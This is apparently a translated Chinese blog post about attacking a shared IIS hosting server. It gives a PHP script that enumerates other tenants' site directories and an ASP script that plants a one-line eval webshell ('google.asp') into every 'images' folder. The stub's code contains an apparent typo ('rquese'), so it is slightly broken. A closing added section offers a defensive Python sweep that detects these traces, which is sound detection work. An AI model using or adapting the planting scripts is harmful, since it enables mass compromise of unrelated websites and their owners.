A Small Tool for Finding Second-Level Directories - Website Security - 自学PHP

Source: 自学PHP网    Time: 2015-04-15 15:00

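I ran into a shared hosting server running IIS 7.0 with over ten thousand sites on it. I only had script-level permissions and no command-line access, but I could write files across directories. If I could get the target site's physical directory, I could finish the job right away. But I tried everything and still could not find the physical path. So the only option was to search with a script; searching by hand would be exhausting. One is a PHP script that does the finding, and the other is an ASP script that does the writing.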

 

<?php
set_time_limit(0);

// Root directory that holds one folder per hosted site.
$path = 'D:/Hosting';

// Name of the second-level entry to look for, taken from ?key=
$somefile = $_GET['key'];

// Results are appended to this file.
$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';

if (!isset($_SERVER['PHP_AUTH_USER'])) {
    header('WWW-Authenticate: Basic realm="My Realm"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'Text to send if user hits Cancel button';
    exit;
} else {
    if (is_dir($path) && is_readable($path))
    {
        $path2 = '';
        $handle = opendir($path);
        while (false !== ($filename = readdir($handle)))
        {
            // Only process first-level folders whose name starts with ?dir=
            if ($filename{0} != $_GET['dir'])
            {
                continue;
            }

            /*
            if($filename{1} != $_GET['two'])
            {
                continue;
            }
            */

            //$path2 = $path.'/'.$filename.'/html';

            $path2 = $path.'/'.$filename;
            if (is_dir($path2) && is_readable($path2))
            {
                @$handle2 = opendir($path2);
                while (false !== ($filename2 = readdir($handle2)))
                {
                    // Log every second-level entry whose name equals ?key=
                    if ($filename2 == $somefile)
                    {
                        //echo'[+]Found !'.$filename2."\n";
                        file_put_contents($logfile, '[+]Found !'.$path2.'/'.$filename2."\n", FILE_APPEND);
                    }
                }
                @closedir($handle2);
            }
        }
        // Record the last first-level folder that was examined.
        file_put_contents($logfile, '[*]LAST '.$path2."\n", FILE_APPEND);
        closedir($handle);
    }
}







<%
Server.ScriptTimeout=500000000

' First character of the folder names to process, taken from ?key=
key = Trim(Request.QueryString("key"))

' Content written into each matching folder.
msg=" <% eval(rquese(Chr(35)))%" &">"

Set FSO=Server.CreateObject("Scripting.FileSystemObject")
Set ServerFolder=FSO.GetFolder("C:\intel")
Set ServerFolderList=ServerFolder.subfolders

For Each ServerFileEvery IN ServerFolderList

    ' Response.write  ServerFileEvery&"</br>"

    ' Only descend into first-level folders whose name starts with key.
    If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then
        Set sServerFolder=FSO.GetFolder(ServerFileEvery)
        Set sServerFolderList=sServerFolder.subfolders

        For Each sServerFileEvery IN sServerFolderList
            ' Write the file into every second-level folder named "images".
            If LCase(sServerFileEvery.name) = "images" Then
                StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8"
            End If
        Next

    End If
Next

' Save sContent to sPath using ADODB.Stream with the given character set.
Function StreamSaveToFile(sPath, sContent, sCharSet)
    Dim oStream

    ' Relative paths (no drive letter) are mapped to a physical path first.
    If(InStr(sPath, ":") <= 0)Then
        sPath = Replace(sPath, ",", ",")
        sPath = Server.MapPath(sPath)
        sPath = Replace(sPath, ",", ",")
    End If

    Set oStream = Server.CreateObject("Adodb.Stream")
    With oStream
        .Type = 2
        .Mode = 3
        .Open
        .Charset = sCharSet
        .WriteText sContent
        .SaveToFile sPath, 2
        .Close
    End With

    Set oStream = Nothing
End Function
%>
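A defender-side sweep for the traces the two scripts above leave on a shared host, as an added example that is not code from the original post: it walks a hosting root and reports script files inside static-content directories, eval stubs among them, and text files carrying the finder's log lines. The extension and directory lists, the function names and the sample tenant IDs are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumed lists for this sketch; tune both to the host's handler mappings.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".aspx", ".ashx", ".php"}
STATIC_DIRS = {"images", "img", "uploads"}
EVAL_RE = re.compile(rb"\b(eval|execute)\s*\(", re.I)   # eval stub in a script
LOG_MARKERS = (b"[+]Found !", b"[*]LAST ")              # lines the PHP finder appends

def sweep(root):
    """Return sorted (relative_path, reason) findings under a hosting root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        parts = {p.lower() for p in os.path.relpath(dirpath, root).split(os.sep)}
        if not parts & STATIC_DIRS:
            continue  # only look inside directories meant for static content
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                head = fh.read(4096)
            ext = os.path.splitext(name)[1].lower()
            if ext in SCRIPT_EXTS:
                reason = "eval-stub" if EVAL_RE.search(head) else "script-in-static-dir"
                findings.append((rel, reason))
            elif any(marker in head for marker in LOG_MARKERS):
                findings.append((rel, "enum-log"))
    return sorted(findings)

def build_sample(root):
    """Write a constructed three-tenant tree (IDs are made up) under root."""
    sample = {
        "1000001/html/index.asp": b'<% Response.Write "ok" %>',
        "1000001/html/images/logo.png": b"\x89PNG\r\n",
        "1000002/html/images/google.asp": b"<% eval(rquese(Chr(35)))%>",
        "1000003/html/images/ennumdir.txt": b"[*]LAST D:/Hosting/1000009\n",
        "1000003/html/images/resize.php": b"<?php echo 1;",
    }
    for rel, data in sample.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*sweep(tmp), sep="\n")
```

A finding in one tenant's directory that was written by another tenant's application pool identity also shows that cross-directory write access is still open on the host.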

 
